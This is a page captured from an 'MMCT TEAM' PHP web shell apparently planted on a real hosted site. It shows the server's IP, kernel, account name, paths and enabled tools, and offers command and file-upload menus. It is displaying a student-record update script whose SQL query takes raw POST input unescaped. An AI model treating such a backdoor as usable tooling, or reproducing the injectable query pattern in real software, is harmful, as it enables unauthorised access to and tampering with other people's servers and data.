MMCT TEAM
Server IP : 2a02:4780:3:1378:0:3736:a38e:10  /  Your IP : 3.138.123.118
Web Server : LiteSpeed
System : Linux sg-nme-web1278.main-hosting.eu 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : u926327694 ( 926327694)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u926327694/domains/smsoft.in/public_html/demo/src/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u926327694/domains/smsoft.in/public_html/demo/src/../Student_entry_update_php.php
<?php 

    // First we execute our common code to connection to the database and start the session 
    require("common.php"); 
     
    // At the top of the page we check to see whether the user is logged in or not 
    if(empty($_SESSION['user'])) 
    { 
        // If they are not, we redirect them to the login page. 
        header("Location: login.php"); 
         
        // Remember that this die statement is absolutely critical.  Without it, 
        // people can view your members-only content without logging in. 
        die("Redirecting to login.php"); 
    } 
     
    // Everything below this point in the file is secured by the login system 
     
    // We can display the user's username to them by reading it from the session array.  Remember that because 
    // a username is user submitted content we must use htmlentities on it before displaying it to the user. 

?>
<?php

require_once './config/config.php';
if ($_SERVER['REQUEST_METHOD'] == 'POST') 
{
	$stud_id= $_POST["Std_Id"];
 $Std_Name=$_POST["Std_Name"];
 $Sex=$_POST["Sex"];
 if($Sex=="")
 {
     $Sex='Male';
 }
$Reg_Number=$_POST["Reg_Number"];
$Class=$_POST["Class"];
$Division=$_POST["Division"];
$Phone=$_POST["Phone"];
$bus_info=$_POST["bus_info"];

mysqli_query($con,"ALTER TABLE `stud_basic` ADD `bus_info` VARCHAR(500) NOT NULL AFTER `status`;");

// echo "UPDATE `stud_basic` SET `Name` = '$Std_Name',  `Class` = '$Class', `Division` = '$Division', `Reg_No` = '$Reg_Number', `Phone` = '$Phone' WHERE `stud_basic`.`Stud_Id` = '$stud_id'"; exit;
mysqli_query($con,"UPDATE `stud_basic` SET `Name` = '$Std_Name',  `Class` = '$Class', `Division` = '$Division', `Reg_No` = '$Reg_Number', `Phone` = '$Phone', bus_info = '$bus_info' WHERE `stud_basic`.`Stud_Id` = '$stud_id'");

?>
<script>
alert("Update Successfull");
document.location="Student_view.php";
</script>

<?php

}else{
	
	header('location: dashboard.php');
}
?>













MMCT - 2023